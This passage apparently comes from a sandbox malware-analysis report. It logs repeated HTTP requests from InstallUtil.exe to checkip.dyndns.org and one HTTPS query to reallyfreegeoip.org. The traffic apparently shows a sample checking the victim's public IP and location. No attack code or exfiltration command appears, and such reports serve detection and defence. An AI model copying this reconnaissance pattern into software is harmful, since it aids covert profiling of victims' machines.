                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 29f4ec91b941e9d20bb01af7a007a009
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.649732158.101.44.242805392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:26.609898090 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:27.184379101 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:27 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 1eff21307638fc9f4a963336deb51a0f
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.649734158.101.44.242805392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:28.009727955 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:28.581563950 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:28 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: c9b366cf6a84c87a643f32b13b7b2955
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.649737158.101.44.242805392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:29.226716995 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:29.793914080 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:29 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: c615e15c2c21736324d94cfe865bfcf3
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.649742158.101.44.24280948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:37.763123989 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:38.426175117 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:38 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 23c1157d41595faf4f57ac7cf960bb89
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:38.472599983 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:38.641663074 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:38 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 404f8ff0f5ec10ffb4a8958f21023a5b
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:39.473717928 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:39.671489954 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:39 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 99213cb7fe616d90e1828c748155fc7b
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.649746158.101.44.24280948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:40.353274107 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:40.943389893 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:40 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: a7096f2b8b4b9fd5f1e6bd2334ecf8ea
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.649750158.101.44.24280948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:41.567612886 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:42.139293909 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:42 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 717b033a9a5d4245c240a4190993fd03
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.649752158.101.44.24280948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:42.789943933 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:43.394529104 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:43 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 76ae8104950bce861e192e74e48d60ff
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.649754158.101.44.24280948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:44.024097919 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:45.398838997 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:45 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 0d24ce5f67447e073c14c088d430dc31
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.649756158.101.44.242801596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:45.546119928 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:46.547883987 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:46 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 14d1d07d8a64667f722be565ed649905
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:46.552124023 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:46.827107906 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:46 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 9030dd05809327a812dd6a38643d81b1
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:47.858067989 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:48.035428047 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:47 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 1cf83745e7908f8b8f3e8950d15159a9
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.649757158.101.44.24280948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:46.559134007 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:48.119939089 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:48 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 2dba7832cbb6bee51ff84cdd17fb14ef
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination Port
                          16192.168.2.649761158.101.44.24280
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:48.694860935 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:49.882810116 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:49 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 9267328e32eade50fcdffe4c339b68dc
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.649762158.101.44.24280948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:48.780050039 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:49.816402912 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:49 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 2c7cb995fc85ebe2b001b4d71f77764f
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.649765158.101.44.242801596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:50.524183035 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:51.098942995 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:51 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: a4ad6a31e2293cd3345be1ef3709ff21
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.649767158.101.44.242801596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:51.738770962 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:52.927912951 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:52 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 45e82c1dd803e62183a3ab292c7d28c0
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.649769158.101.44.242801596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:53.773138046 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:54.681615114 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:54 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 3801d7460e15c9cba09a24b33698239b
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.649773158.101.44.242801596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:55.331221104 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:56.602490902 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:56 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: d2ff4453190d20c60d7e2aeb8683b35c
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.649775158.101.44.242801596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:57.250965118 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:57.833131075 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:57 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: ea1de5fc1546283344cdcf47c25ffd84
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.649717188.114.97.34435392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:18 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:18 UTC710INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:18 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40922
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
